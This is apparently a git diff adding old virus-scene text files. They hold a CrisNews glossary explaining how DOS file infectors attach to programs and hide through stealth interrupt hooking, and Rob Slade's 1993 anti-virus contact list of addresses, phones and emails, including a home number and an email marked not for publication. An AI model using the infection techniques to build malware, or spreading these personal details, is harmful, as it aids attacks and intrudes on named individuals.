wannabe's) available. Since +the person downloading it only finds out afterwards, the spread of viruses +from these BBS's is not as bad as it might have been. + +There also seems to be a growing maturity amongst some members of the +underground, leading to fewer virus writers and viruses. Hopefully, they will +ALL grow up soon. + + +Cheers, Ian + diff --git a/textfiles.com/virus/cnws2003.vir b/textfiles.com/virus/cnws2003.vir new file mode 100644 index 00000000..f24d86e3 --- /dev/null +++ b/textfiles.com/virus/cnws2003.vir @@ -0,0 +1,103 @@ +CrisNews #2 - 05/01/94 + +By: Childe Roland - Cris South Africa + +This is an attempt to explain some of the terminology used in +connection with viruses. + + + File infecting viruses. + + These viruses spread by adding code to executable files and thus + have the potential to become active when an infected program is + executed. Therefore they must make some change in the target file. + If normal DOS calls are used to write to it the file-creation + date will be changed. When code is added to it the file size will + change. Should areas of the file be overwritten the length may re- + main unchanged but CRC or checksum checking can detect the change + in the file. + This brings us to: + + 1.Overwriting viruses.The simplest of these just overwrite a part + of the target file and puts a jump at the beginning of the pro- + gram pointing to the viral code. This tends to limit their success + as loss of the overwritten code may be fatal to the program. To + increase their chance of success, some, like the Zerohunt virus, + look for a string of nul characters of sufficient length to acco- + modate it. Some append the overwritten part of the file to the + end like the Nina virus which overwrites the beginning of the file + and the Phoenix which overwrites a random section of the target, + and then append the overwritten part to the end. + Both the 512 and 1963 overwrite the beginning of a file and moves + the overwritten code into a portion of the last cluster occupied + by the file where there is often space which is invisible to the + operating system. + + 2.Prepending viruses.These viruses add their code to the beginning + of the target program. This ensures that the virus is executed + everytime the program is, also that this happens before the pro- + gram runs and it therefore has priority in terms of operation and + possible conflicts. It is also necessary to alter the FAT at + least to ensure that the program call starts with the viral code + and that the viral code is not overwritten by other changes to + tha disk or files. The original code is left unchanged but the + is altered and unless techniques are used to disguise this it + will show a different creation date and size. The Rat virus in- + serts itself in unused space in EXE file headers. The Suriv 2.01 + moves the body of the file and inserts itself between the header + and original file and then changes the relocation information + in the header. + + 3.Appending viruses. These viruses add their code to the end of + the target. They must change the file header code to ensure that + the file execution starts towards the end and not at the normal + position. At the end of the viral code there is a jump pointing + to the start of the target program. Here too the file size and + date will change. + + 4.Companion viruses. Also known as spawning or precedence viruses. + In files with similar names there is an order of precedence in + their execution under DOS. First on the list is .com files, then + .exe and then .bat files, i.e. virus.com is executed before + virus.exe and last is virus.bat file.These viruses create a file + with a similar name but a .com extension, thus the .com is al- + ways executed in place of the original .exe file. The original + stays exactly the same and no change detection programs will pick + up the virus. The virus usually ends with a specific call to the + original program while it has the hidden attribute set for it- + self. + + Stealth viruses. + + A virus usually contains some identifiable string or code that + can be used to identify it, even when it is new or polymorphic. + Stealth thus refers to the various mechanisms virus programs use + to hide themselves. The earliest attempts at hiding were pre- + venting the file size from changing and resetting the file crea- + tion date to the original. + + Then there is the DIR II virus. The viral code is written to one + section of the disk and then it alters the directory and file + allocation information in such a way that all programs seem to + start at that one section of the disk where the viral code is + situated. + + Nowadays stealth refers more to the trapping mechanisms viruses + use to prevent detection. These tricks are only effective once + the virus is memory resident ( or active in memory.) The virus + can do this because few programs read or write directly to the + disk and leave the manipulation of the disk to the underlying + software and hardware. The operating system provides standard + interrupts which are system calls to the required functions. + When a program reads from or writes to a disk it does this by + calling standard interrupts or functions from a standard known + address. Code can be inserted at the standard address which + redirects the call to the code provided by the virus and it + filters the data returned to the calling program. When an in- + fected program is read the infection does not appear in the + data that the calling program receives and no trace of the + virus program can be found on disk. + + -------------------------------------------------------------- + childe roland. + diff --git a/textfiles.com/virus/cnws2004.vir b/textfiles.com/virus/cnws2004.vir new file mode 100644 index 00000000..c18e58ec --- /dev/null +++ b/textfiles.com/virus/cnws2004.vir @@ -0,0 +1,1955 @@ +CrisNews #2 - 05/01/94 + +---------------------------------------------------------------------------- +Have you ever thought you would like to call or write some of the AV +People you hear so much about? + +Well here you are a AV list with all of the info you will need! We give our +thanks to Robert for posting this info public for us all to gaze at :) + +---------------------------------------------------------------------------- + + Robert Slade Anti-Virus Contact List + + Re-Printed from A Message Capture + +From m2xenix!decus.arc.ab.ca!roberts +From: roberts@decus.arc.ab.ca ("Rob Slade, Ed. DECrypt & ComNet, VARUG rep, +604-984-4067") +To: INTNET::EAN%"mikko.hypponen@wavu.elma.fi" <@review@TITAN.arc.ab.ca> +Date: 8 Nov 93 14:31 -0600 + +Abacus +5370 52nd St., SE +Grand Rapids, MI 49512 +USA +800-451-4319 +616-698-0330 +fax: 616-698-0325 +Computer Viruses: a high tech disease, Ralf Burger, 1988, 1-55755-043-3 (no +longer available) +Virus Secure for Windows (no longer available) +Computer Viruses and Data Protection, Ralf Burger, 1-55755-123-5 + +ACM Press +11 W. 42nd St., 3rd Floor +New York, NY 10036 +212-869-7440 +Computers Under Attack: intruders, worms and viruses, Peter J. Denning, ed., +0-201-53067-8 +pjd@cs.gwu.edu + +A.C.C Inc. +West Orange, New Jersey, 07052 +USA +Contact Wendy Schwartz +1-201-325-7985 or 1-201-736-7109 +fax# 1-516-378-6124 +V-Phage hard disk write protect + +Sandy Jenish, Dave Reid (VP Marketing) +Advanced Gravis Computer Technology +7033 Antrim Avenue +Burnaby, B. C. +V5J 4M5 +604-434-7274 +Telecopier: (604) 434-7809 +Advanced Security for PC and Mac (product withdrawn) + +Aladdin Knowledge Systems +India +Marketed by Doon Instrument Processors +"Hasp" security card + +Henrik Alt +Kirgelweg 25 +7160 Gaildorf +Germany +Tel. 07971/7996 +Kto. 6428662, bei KSK Schbisch Hall, Blz 622 500 30 +Sagrotan (Atari) + +American Eagle Publications +P. O. Box 41401 +Tucson, Arizona 85717 +USA +602-888-4959, -4957 +The little black book of computer viruses, Mark Ludwig + +Antivirus Methods Congress (defunct?) +Dick Lefkon +New York University +dklefkon@well.sf.ca.us + +Borland/Ashton-Tate +20101 Hamilton Ave. +Torrance, CA 90509-9972 +USA +213-329-9989 +BBS: 213-324-2188 (920908 area changed to 310, number referred to 408-431-2275) +or +Department CR-10 +52 Oakland Avenue +East Hartford CT 06108 +Control Room system management package with antiviral utility + +ASP Press +PO Box 81270 +Pittsburgh, PA 15217 +USA +412-422-4134 +or +PO Box 1480 +Hudson, OH 44236 +cohen@fitmail.fit.qut.edu.au (Mr Fred Cohen) +"Computer Viruses", Fred Cohen, IT antiviral? + +Autrec Inc. +4305 - 40 Enterprise Drive, Suite A +Winston-Salem, NC 27106 +USA +(919) 759-9493 +PC-SAFE II half card security board + +B.R.M. +Israel +V-Analyst checksumming program + +Bangkok Security Associates +888/32-33 Ploenchit Road +Bangkok 10330 +Thailand +TEL: 662-251-2574 +BBS: 662-255-5981 +FAX: 662-253-6868 +Alan_Dawson@mindlink.bc.ca +or Delta Base Enterprises +221 - 32853 Landeau Place +Abbotsford, BC, V2S 6S6 +TEL: 853-2998 +FAX: 853-9164 effective NOV18/92 +72137.603@compuserve.com or a682@mindlink.bc.ca +or Computer Security Associates +(803)-796-1935 +Lannatec Associates Inc, +166 Anna Avenue, +Ottawa, Ont. +K1Z 7V2 +(613)-724-5978. +Victor Charlie 5.0 - change detection + +Bantam Books/Doubleday/Dell +666 Fifth Ave. +New York, NY 10103 +USA +V.I.R.U.S. Protection, Pamela Kane, 0-553-34799-3 + +Christopher Mateja +Bits-N-Bytes Computer Services +333 15th St +Brooklyn, NY 11215 ( USA ) +BITNET: +INTERNET: +COMPUSERVE: 75230,476 +virus database (product not yet available) + +Black Box Canada Corporation +1111 Flint Road, Unit 13 +North York, Ontario +M3J 3C7 +800-268-9262 +416-736-8011 +Fax: 800-268-4221 +PC Security Board + +NCC Blackwell +1001 Fries Mill Road +Blackwood, NJ 08012 +609-629-0700 +800-257-7341 +Viruses, bugs and Star Wars, Geoff Simons, 1989, 0-85012-777-7 + +Brightwork Development Inc. +766 Shrewsbury Ave. +Jerral Center West +Tinton Falls, NJ 07724 +USA +908-530-0440 +201-530-0440 +800-552-9876 (US only) +fax: 201-530-0622 +Sitelock, Novell add-on operation restricting software $495 + +British Computer Virus Research Centre +12 Guildford Street, Brighton, East Sussex, BN1 3LS, England +Tel: 0273-26105 +Joe Hirst +Virus Simulation Suite, Eliminator/Virus Monitor/Virus Clean +see also ICVI, Thecia Systems + +Laboratory of Computer Virology +Bulgarian Academy of Science +Address: Bulgaria, + Sofia 1113 +acad. G. Bontchev str. bl.8 rm. 104 +tel: +359-2-719212 +bbs: +359-2-737484 (9600bps) +Assen Sharlandjiev +EUnet: assen@virbus.bg +FidoNet: 2:359/110@fidonet.org + +Business One Irwin +Homewood, IL 60430 +(Publisher One +Baltimore, Maryland?) +Chris Fuedo - xi685c@gwuvm.gwu.edu +Chris Feudo ("No such user" at gwuvm.gwu.edu) +The Computer Virus Desk Reference, 1992 + +Canadian Information Processing Society (CIPS) +Alana Foster, Newsletter Editor +c/o Central Guaranty Trust +1770 Market St., 6th Floor +Halifax, Nova Scotia +B3J 1N2 +fax: (902) 422-9290 +(no known specialty, included for info only) + +Canadian System Security Centre +Communication Security Establishment +(613) 991-7331 +Fax: (613) 991-7323 +Aaron Cohen acohen@cse.dnd.ca +ftp site manitou.cse.dnd.ca + +Carmel Software Engineering +EPG International +Hans-Stiessberger-Strasse 3 +D-8013 Haar by Muenchen +head office Israel? +Turbo Anti-Virus Set, scanner vaccine and change checker (including boot) + +CARO = Computer Antivirus Research Organisation +Christoph Fischer +Micro-BIT Virus Center +University of Karlsruhe +Zirkel 2 +W-7500 KARLSRUHE 1 +Germany ++49 721 376422 Phone ++49 721 32550 FAX +email: ry15@rz.uni-karlsruhe.de or vquery@rz.Uni-Karlsruhe.de + +CE Software +1854 Fuller Road +PO Box 65580 +West Des Moines, IA 50265 +Don Brown +Vaccine (Mac) + +Central Point Software +15220 N. W. Greenbrier Parkway #200 +Beaverton, OR 97006 +USA +503-690-8090 +503-690-8088 +800-445-4064 +800-445-4208 +Central Point Anti-Virus + +Century Hutchinson Ltd +(Century Communications 708-647-1200?) +(Century International 508-478-2000, 800-252-4752?) +(Century One 719-471-1322?) +(Century Publishing House 219-294-3789?) +New Hacker's Handbook, Steve Gold, 1989, 0-7126-3454-1 + +Certus International (see also Symantec/Norton) +13110 Shaker Square +Cleveland, Ohio 44120 +(Brecksville, OH?) +USA +216-546-1500 +216-752-8181 +216-752-8183 Technical Support +BBS 216-752-8134 +fax 216-752-8188 +800-722-8737 +800-729-6684 +Mike Mytnick, Cleveland +Michael Blumenfeld (404)434-1858 +Peter Tippett, 4295370 on MCI mail +operation restricting software, particularly for LANs + +Cheyenne Software +55 Bryant Avenue +Roslyn, NY 11576 +USA +800-243-9462 +516-484-5110 +InocuLAN + +COAST Project +Software Engineering Research Center & Dept. of Computer Sciences +Purdue University +W. Lafayette IN 47907-1398 +Gene Kim genek@mentor.cc.purdue.edu author +spaf@cs.purdue.EDU (Gene Spafford) phone: (317) 494-7825 +ftp.cs.purdue.edu pub/spaf/COAST/Tripwire +Tripwire integrity-monitor for Unix + +Command Software Systems +Jupiter, FL +407-575-3200 +800-423-9147 +75300.3645@CompuServe.COM +Lance McKay +or +93 Dewson St., Suite 101 +Toronto, Ontario +416-588-8341 +fax: 416-537-0998 +BBS: 416-532-0456 +F-PROT Professional (cf Frisk) + +Commcrypt Inc. +10000 Virginia Manor Road, Suite 300 +Beltsville, MD 20705-2500 +301-470-2500 +301-470-2503 +800-334-8338 +Fax: 301-470-2507 +BBS: 301-470-2510 +Detect Plus + +ComNETco, Inc. +29 Olcott Square +Bernardsville, NJ 07924 +USA +201-543-4060 +ViruSafe-Anti-Viral Software (cf EliaShim) +mail undeliverable + +Computer Consulting Group, Inc. +Old Highway 99 South +Ashland, OR 97520 +503-488-3237 +800-488-3236 +VirusClean + +Computer Emergency Response Team +Software Engineering Institute +Carnegie Mellon University +(412) 268-7090 (CERT 24 hour hotline) + +Computer Integrity Corporation +PO Box 17721 +Boulder, CO 80308 +Vaccinate + +Computer Security Connection (CSC) +National Security Associates, Inc. (NSAi) +mbrsvcs @ incomsec.org +FAX 703-758-8338 +$30.00 registration fee and $12.50 per hour of access time. + +Computer Virus Research Lab Wiesbaden +Howard Fuhs Elektronik +Rheingaustr. 152 +6200 Wiesbaden-Biebrich +Tel.:+49 611 67713 +Fax:+49 611 603789 +FIDO: 2:244/2120.7 +100120.503@CompuServe.com + +Computer Technologies NZ +PO Box 3598 +Wellinton, New Zealand +Jeremy Buckley jerry@tornado.gen.nz +jerry%tornado.gen.nz@mailhost.comp.vuw.ac.nz +Simon McAuliffe sai@tornado.gen.nz +NOVASAFE + +COMRAC +Postbus 710 +2130 AS Hoofddorp +The Netherlands +Victor Smith +G. Beekmans, Director +31 2503 21388 +BBS 31-3200-48835, Virus Rescue, Node: 2:282/401, 9:310/2 +or 31-3200-48831, Paradise Island +Gobbler II scanner + + +3250 South Western Avenue +Chicago, IL 60608 +312-782-9181 +Beaverbooks Ltd. +195 Allstate parkway +Markham, Ontario L3R 4T8 +Virus!: the secret world of computer invaders that breed and destroy, Allen +Lundell, 1989 + +Cordant Inc. +11400 Commerce Park Drive +Reston, VA 22091-1506 +USA +(703)758-7303 +Bryan Dorsey +Assure HW/SW antiviral + +COSMI, Inc. +431 N. Figueroa Street +Wilmington, CA 90744 +310-835-9687 +Virus Terminator + +Miller Freeman/CSI +600 Harrison Street +San Francisco, CA 94107 +415-397-1881 +415-905-2470 +Computer Security Handbook +CSI Black Book +The PC virus control handbook, Jacobson, 1990 + +CSE +Computer Security Engineers LTD +St. James House +New St. James Place +St. Helier +Jersey JE4 8WH +Channel Islands +Tel.: +44 534 500 400 +Fax : +44 534 500 450 +Research and Development +P.O.Box 85502 +2508CE Den Haag +Netherlands +Tel.: +31 70 36 52 269 +Fax : +31 70 36 52 286 +Niels-Jorgen Bjergstrom Commercial Director +Righard Zwienenberg programmer +Support BBS: +31 70 38 98 822 +(see also Computer Virus Research Lab Wiesbaden) +PC Vaccine Professional + +CSM Management and Consulting +3031 Main St. +Vancouver, B. C. +V5T 3G8 +604-879-4162 +Telecopier: 604-874-1668 +Overlord +product not available + +Cybec +PO Box 205 +Suite 3, 350 Hampton Street +Hampton, Victoria 3188 +Australia +Tel. +61 3 521 0655 +Fax. +61 3 521 0727 +Nichols Engleman s907997@godzilla.cgl.rmit.oz.au or @numbat.cs.rmit.oz.au +Roger Riordan riordan.cybec@tmx.mhs.oz.au, riordan@mhs.oz.au, +riordan@tmxmelb.mhs.oz.au +VET antiviral + +CyberSoft +210 West 12th Avenue +Conshohocken, PA 19428-1464 +(215) 825-4748 FAX (215) 825-6785 +research@cyber.com +VFIND UNIX antiviral + +CyberStore +Data : 604-526-3676 +Phone: 604-526-3373 +Fax : 604-526-0607 +commercial BBS system, archive of Slade reviews, columns and virus history +archives, also V.I.R.U.S. Doctor BBS feed + +Cylink +110 S. Wolfe Road +Sunnyvale, CA 94086 +USA +408-735-5800 +telecopier: 408-738-8269 +SecurePC - half card DES encryptor + +Data Fellows Ltd +Wavulinintie 10 +SF-00210 Helsinki, FINLAND +tel +358-0-692 3622 ++358-49-648-180 (mobile) +fax +358-0-670 156 +Ari Hypponen, hyde@ngs.fi +Mikko.Hypponen@compart.fi Mikko.Hypponen@wavu.elma.fi +f-prot@df.elma.fi +Data security consulting (Unix, MS-DOS, Macintosh, LANs) +Anti-virus consulting +F-PROT SF -- The Scandinavian version of the F-PROT anti-viral + package, supporting Finnish, Swedish, and English + +Datamedia Corporation +20 Trafalger Square +Nashua, NH 03063 +603-886-1570 +fax: 603-886-1782 +One Woodlands Court +Ash Ridge Road +Almondsbury, Bristol BS12 4LB +454 201515 +FAX: 454 616367 +SECUREcard for PC + +Datawatch Corporation +Triangle Software Division +P. O. Box 51489 +Durham, NC 27717 +(formerly Microcom Software Division +3700-B Lyckan Parkway +Durham, NC 27717 +USA +also Norwood, MA) +919-490-1277 +800-822-8224 +BBS: (919) 419-1602 +Virex-PC, also Virex for Mac - scanner +Mary Golden-Hughes +Glenn Jordan - beta list Fidonet: 1:155/223 +Jordan C. Glenn -- Microcom +cynic!van-bc!rock.concert.net!trent +see also Software Concepts Design + +George Davidsohn and Son Inc./The Davidsohn Group +20 Exchange Place, 27th Floor +New York, NY 10005 +USA +212-422-4100 +Telecopier 212-422-1953 +800-999-6031 +tech support 212-363-3201 +PR - Howard J. Rubenstein Assoc. Inc. +212-489-6900 - Laurie N. Terry +warren@worlds.com +Vaccine Version 5.00 - Anti-Viral Software. + +DECUS Canada +505 University Avenue, 15th Floor +Toronto, Ontario +M5G 1X4 +416-597-3437 +Fax: 416-971-5295 +Anne Murakami, Office Manager, annem@decus.ca +Robert Blain, SecSIG Chair +Robert Slade, SecSIG DECrypt editor, roberts@decus.ca +SecSIG DECrypt newsletter with strong virus component + +Deloitte & Touche +Computer Viruses, Deloitte Haskins & Sells, 1989 + +Digital Development Corporation +"virus checking" add-in board + +Digital Dispatch, Inc. +55 Lakeland Shores Road +Lakeland, Minn 55043-9601 +612-436-1000 +800-221-8091 +Antigen, Data Physician, Novirus-Anti-viral software + +Digital Enterprises +Gaithersburg, MD +V-Card + +Director Technologies Inc. +906 University Place +Evanston, IL 60201 +USA +Disk Defender-Half-Slot Virus Write-Interrupt Device + +Diversified Computer Products and Services +617-592-9001 +fax: 617-776-1515 +PC Doctor + +DogSoft +Dmitry O. Gryaznov +E-mail: grdo@grdo.botik.yaroslavl.su +Program Systems Institute +Russian Academy of Sciences +P/O Box 16, Pereslavl-Zaless +Yaroslavskaya, 152140 Russia +Phones: +7-085-359-8122 +BBS: +7-085-359-8301 +PC Shield - scanner/repair plus other components + +EICAR = European Institute of Computer Antivirus Research +Dr Paul Langemeyer +c/o Siemens Nixdorf AG +Otto-Hahn-Ring 6 +D-8000 Muenchen 83 +Germany +Tel: (+49) 089 636 82 660 +Fax: (+49) 089 636 82 824 + +EliaShim Microcomputers +520 W. Hwy. 436, #1180-30 +Altamonte Springs, Florida +USA +407-682-1587 +fax: 407-869-1409 +VirusSafe - TSR scanner cf Xtree (cf ComNETco?) + +Elsevier +Mayfield House +256 Banbury Road +Oxford OX2 7DH +England +655 Avenue of the Americas +New York, NY 10010 +USA +212-989-5800 +fax: 212-633-3990 +Computer Virus Handbook, Harold Joseph Highland, 1990, 0-946395-46-2 +highland@dockmaster.ncsc.edu + +Bob Bosen +Enigma Logic Inc. +2151 Salvio Street, #301 +Concord, CA 94565 USA (94520?) +Tel: (415) 827-5707 + (800) 333-4416 (not from Canada) +FAX: (415) 827-2593 +Internet: 71435.1777@COMPUSERVE.COM +Safeword - change detection software + +Paul Ferguson +Sentry Net BBS (1:109/229) +Centreville, VA +USA +BBS: 703-815-3244 +Fidonet VIRUS_INFO Moderator, editor Legal Net Monthly + +Fifth Generation Systems, Inc. +P.O. Box 83560 +Baton Rouge, Louisiana +USA 70884-3560 +10049 N. Reiger Rd. +Baton Rouge, Louisiana +USA 70809-4559 +800-677-1848 +800-365-3186 +1-800-873-4384 sales and info (number invalid?) +504-291-7283 tech support +800-766-7283 tech support +(David Kirby 75300.3661@compuserve.com) +telecopier: 504-292-4465 +Business Phone: (504) 291-7221 +FAX: (504) 295-3268 +Clivedon Office Village +Lancaster Road, High Wycomb +Bucks, HP12 3YZ, England +Business Phone: +44-(0)-494-442224 +FAX: +44-(0)-494-442225 +Sales/Support: +44-(0)-494-442223 +3715 Sun Hung Kai Centre +30 Harbour Rd. +Waichai, Hong Kong +Business Phone: (852) 827 6977 +Fax: (852) 824 3200 +markets Mace Vaccine-Anti-viral software, Disklock hard disk security +also Untouchable, a renaming of V-Analyst by B.R.M. Technologies, Israel +Search and Destroy + +Fink Enterprises +11 Glen Cameron Road, Unit 11 +Thornhill, Ontario +L3T 4N3 +416-764-5648 +Telecopier: 416-764-5649 +IRIS Antivirus (from Israel, cf Techmar) + +Fischer International Systems Corporation +P. O. Box 9107 +4073 Merchantile Avenue +Naples, Florida 33942 +813-643-1500 +800-237-4510 +Watchdog + +Foley Hi-Tech Systems +172 Amber Drive +San Francisco, CA 94131 +(415) 826-6084 +(415) 826-1707 BBS +(415) 826-1706 FAX +Safety Disk + +FoundationWare +2135 Renrock Rd. +Cleveland, OH 44118 +USA +Vaccine 1.2-Anti-viral software +mail undeliverable, now Certus + +Fresh Technology +1478 North Tech Blvd., Suite 101 +Gilbert, Arizona 85234 +USA +800-79FRESH (793-7374) (not working) +Fax: 602-497-4200 +AntiVirus Assist (repackaging of McAfee NETSCAN and CLEAN) + +Fridrik Skulason +Frisk Software International +Postholf 7180 +IS-127 Reykjavik +Iceland +Phone number +354-1-617273 +Fax number +354-1-617274 +frisk@complex.is +F-PROT 2.xx Virus detection/protection/disinfection + +G4 Software +800-486-9552 +fax: 310-536-9796 +Virotect + +Gee Wiz Software Company +c/o Mrs. Janey Huie +10 Manton Avenue +East Brunswick, NJ 08816 +USA +Dprotect-Anti-Trojan Software + +Gilmore Systems +P.O. Box 3831 +Beverly Hills, CA 90212-0831 +U.S.A. +Voice: (213) 275-8006 +Data: (213) 276-5263 (920908 area now 310, connects to fax) +FICHECK/MFICHECK change detection software +post box defunct 920810 (company too?) + +Gavin Godby +Programmer/Analyst +Rm 3-10 Ag. For. Centre +University of Alberta +Edmonton, Alberta +CANADA T6G 2P5 +email: BITNET: USERGAVN@UALTAMTS + Internet: USERGAVN@mts.ucs.ualberta.ca + SUZY +ANTIVIR boot sector change detection/replacement + +Ross Greenburg +Post Office Box 908 +Margaretville, New York 12455 +(Virus Acres +New Kingston, NY 12459) +914-586-2023 +(formerly Software Concepts Design +594 Third Avenue +New York, NY 10016 +212-889-6431 +BBS: 212-889-6438) +607-326-4422 +fax: 607-326-4424 +Flushot-Anti-Viral Software. +see also Microcom + +Patricia M. Hoffman +3333 Bowers Ave Suite 130 +Santa Clara, CA 95054, USA +Tel. : 1-408-988-3773 +FAX : 1-408-988-2438 +BBS : 1-408-244-0813 +75300.3005@compuserve.com +Virus Summary Document +also distributed by: +Roger Aucoin +Vacci Virus +84 Hammond Street +Waltham, MA 02154 +Voice: 1-617-893-8282 +FAX : 1-617-969-0385 + +Denny Kirk +Hyper Technologies +211 - 3030 Lincoln +Coquitlam, B. C. +604-464-8680 +Integrity +still in production, not yet available + +IBM High Integrity Computing Lab +Thomas J. Watson Research Center +P. O. Box 218 +Yorktown Heights, New York +USA 10598 +David Chess CHESS@WATSON.IBM.COM, CHESS@YKTVMV.BITNET +VIRSCAN +*Note* - customers should contact IBM rep, not HICL directly + +"Ides of March" Virus Conference (defunct?) +Richard G. Lefkon +NYU, DPMA Fin. Ind. Ch. +609 West 114th Street +New York, NY 10025 +(212) 663-2315 + +Information Systems to Increase Profits +P. O. Box 4529 +Middletown, New York 10940 +USA +800-274-3007 +Fax: 914-496-3504 +Sys Guard, Sys Guard Security Card and Virus Guardian VG-303 card + +Integrity Technologies, Inc. +1395 Main Street +Metuchen, NJ 10004 +VirALARM 2000 PC + +Intel Corp. +3065 Bowers Ave. +Santa Clara, CA 95051 +USA +Hillsboro, OR + 503-629-7000 +Sales: 800-538-3373 + 44-793-431-155 +BBS: 503-645-6275 + 44-793-432-955 +Fax: 800-458-6231 + 503-629-7580 + 44-793-431-166 +FaxBACK800-525-3019 + 44-793-432-509 + 503-629-7576 +Pay: 900-288-7700 ($30 per call) + 44-793-431-144 + 44-793-421-777 (French) + 44-793-421-333 (German) +LANDesk Virus Protect (formerly LANProtect 1.0) + +International Microcomputer Software Inc. (IMSI) +1938 Fourth Street +San Rafael, CA 94901 +USA +415-454-7101 +800-833-4674 +BBS 415-454-2893 +VirusCure Plus + +Computer Virus Info Group +Information Security Research Centre +Faculty of Information Technology +Queensland University of Technology +Box 2434 Brisbane 4001 AUSTRALIA +Phone: +61 7 864-2111 +Fax: +61 7 864-1507 +Wayne Boxall +boxall@fitmail.fit.qut.edu.au +boxall@qut.edu.au +864-2095 + +International Computer Virus Institute +1257 Siskiyou Boulevard, Suite 179 +Ashland, OR 97520 +USA +503-488-3237 +503-482-3284 +BBS 503-488-2251 +Eliminator anti-viral, virus simulators plus books and consulting +see also British Computer Virus Research Centre, Joe Hirst + +International Security Technology Inc. +99 Park Avenue, 11th Floor +New York, NY 10016 +212-557-0900 +fax: 212-808-5206 +(formerly +515 Madison Avenue, #3200 +New York, NY 10022 +USA +212-288-3101 +fax: 212-644-6828) +Virus-Pro +PC Virus Control Handbook, Jacobsen, 1990 +Using McAfee Associates Software for Safe Computing, Jacobsen, 1990 + +Interpath Corporation +Cylene-4-Anti-Viral software, no longer produced +defunct, cf McAfee + +IPE Corporation Ltd/International Data Security +9-10 Alfred Place +London WC1E 7EB +England, +tel. +44 71 436 2244 +fax: +44 71 580 1466 +(G. McLeod?) +"Secure Times" periodical + +IP Technologies +3710 S. Susan St., #100 +Santa Ana, CA 92704 +USA +714-545-9001 +fax: 714-549-5075 +Virus Guard + +IRIS +7a Pinchas Rosen Street +Tel Aviv 69512, Israel +Virus-Free (cf Fink, Techmar) + +Lee Jackson +4255 Rosehill Rd #2 +Garland, TX 75043 +USA +Author, The Hack Report +Moderator, FidoNet SHAREWRE and WARNINGS echos +Internet: ljackson@BIX.com, FidoNet Node 1:124/4007 (Pvt) + +Johnson Computer Systems, Inc. +20 Dinwiddie Place +Newport News, Virginia 23602 +(804) 872-9583 +PCVAULT software write protection + +Chris Johnson +Gatekeeper and Gatekeeper Aid (Mac) + +KWARE Inc. +2952 Timberwood Way +Herndon, VA 22071 +dist. by REB Management Consultants Inc. +8518 Spartan Road +Fairfax, VA 22031 +703-560-2076 +SEER (MS-DOS) + +Laboratory of Computer Virology +Bulgarian Academy of Sciences +ul. Acad. G. Bontchev, bl. 8, rm. 104 +1113, Sofia, Bulgaria +Phone: +359-2-719212 +BBS: +359-2-737484 (Virus Busters) +FidoNet: 2:359/110 +EUnet: user@virbus.uucp + where user is one of the following: + postmaster - the general account + eugene - the boss + assen - the communications guy + shu \ + ivan ) - the programmers + michail / + katrin - public relations + +Lasertrieve, Inc. +395 Main Street +Metuchen, NJ 08840 +USA +Viralarm-Anti-Viral Software +moved (defunct?) + +LeeMah DataCom Security Corp. +3948 Trust Way +Hayward, CA 94545 +USA +415-786-0790 + +Stephen A. Lentz +(602) 274-8001 +working with Hal Becker (602) 841-0962 +U.S. patent 4,975,950 +"System and Method of Protecting Integrity of Computer Data and Software" + +Leprechaun Software Pty Ltd +PO Box 134 +Lutwyche Queensland 4003 +Australia +Lindsay Hough +61 7 2524037 +Leprechaun International +2284 Pine Warbler Way +Marietta Georgia 30062 USA +404 971 8900 +fax 404 971 8988 +800-521-8849 +Roger Thompson home 404-509-7314 +Wanikas Software Inc. +Suite 4, 60 St. Claire Ave. W. +Toronto, Ont. +M4V 1M7 +(416) 920-5006 +Fax: (416) 920-0778 +Virus Buster + +Levin and Associates +PO Box 14546 +Philadelphia, PA +19115 +215-333-8274 +Checkup change detection (MS-DOS) + +Roger Lindberg +Cyklonvagen 3 +451 60 Uddevalla +SWEDEN +FLIST and FCHECK (Atari) + +Look Software +Cliff Livingstone +P. O. Box 78072, Cityview +Nepean, Ontario K2G 5W2 +613-837-2151 +800-267-0778 +fax: 613-837-5572 +VirusAlert! (contains F-Prot, cf Frisk) + +Paul Mace Software +400 Williamson Way +Ashland, OR 97520 +USA +tech support 503-488-0224 +fax: 503-488-1549 +sold and supported through: +Fifth Generation Systems, Inc. +10049 N. Reiger Rd. +Baton Rouge, Louisiana +USA 70809 +800-677-1848 +1-800-873-4384 sales and info +504-291-7283 tech support +504-291-7221 admin +telecopier: 504-292-4465 +Mace Vaccine-Anti-viral software. + +Magna +2540 North First Street, Suite 302 +San Jose, CA 95131 +800-755-MAGNA +408-433-5467 +Empower II (Mac) + +Mainstay +5311-B Derry Avenue +Agoura Hills, CA 91301 +Antitoxin (Mac) + +Management Advisors Publications +P. O. Box 81151 +Wellesley Hills, MA 02181 +USA +617-235-2895 +Computer Viruses: Realities, Myths and Safeguards + +Maze Computer Group +PO Box 515 +Lenon Hill Station +(New York, NY 10021?) +V*Screen + +McAfee Associates +3350 Scott Blvd, Bldg 14 +Santa Clara, California +95054-3107 USA +Voice (408) 988-3832 +FAX (408) 970-9727 +BBS (408) 988-4004 +CompuServe ID: 76702,1714 or GO MCAFEE +Viruscan suite of programs +Morgan Schweers - mrs@netcom.com (personal account, do not publish) +Aryeh Goretsky,Tech Support +aryehg@darkside.com +mcafee@netcom.com +aryeh@mcafee.com +support@mcafee.com +mcafee.com is IP 192.187.128.1 + +Mike McCune +MMCCUNE@SCTNVE.... +FTP from mibsrv.mib.eng.ua.edu in pub/ibm-antivirus/innoc.zip +INNOC Boot Virus Immunizer, boot sector overlay renders non-booting + +McGraw-Hill Ryerson/Osborne +300 Water Street +Whitby, Ontario +L1N 9B6 +416-430-5000 +416-430-5047 Rita Bisram, Marketing +fax: 416-430-5020 +or +2600 Tenth St. +Berkeley, CA 94710 +USA +415-548-2805 +800-227-0900 +The Computer Virus Handbook, Richard Levin, 1990, 0-07-881647-5 + +Microcraft, Inc. +PO Box 1652 +Richmond, IN 47374 +Vir-X + +Micronyx Inc +1901 N. Central Expressway, Suite 400 +Richardson, TX +USA 75080 +800-634-8786 +214-690-0595 +214-644-1344 tech support +fax: 214-690-1733 +7 Canon Harnett Court +Warren Farm Office Village +Stratford Road, Wolverton Mill +Milton Keynes, England MK12 5NF +0908-221247 +Fax: 0908-223416 +SAFE (Secure Access For the Enterprise) + +Microseeds Publishing, Inc. +5801 Benjamin Center Drive, Suite 103 +Tampa, Florida 33634 +USA +813-882-8635 +authors Frederic Miserey and Jean-Michel Decombe from France +Rival Mac antiviral + +Miller Freeman/CSI +600 Harrison Street +San Francisco, CA 94107 +415-397-1881 +415-905-2470 +Computer Security Handbook +CSI Black Book +The PC virus control handbook, Jacobson, 1990 + +The Ministry of International Trade and Industry +Computer Virus Office +IPA(Information-Technology Promotion 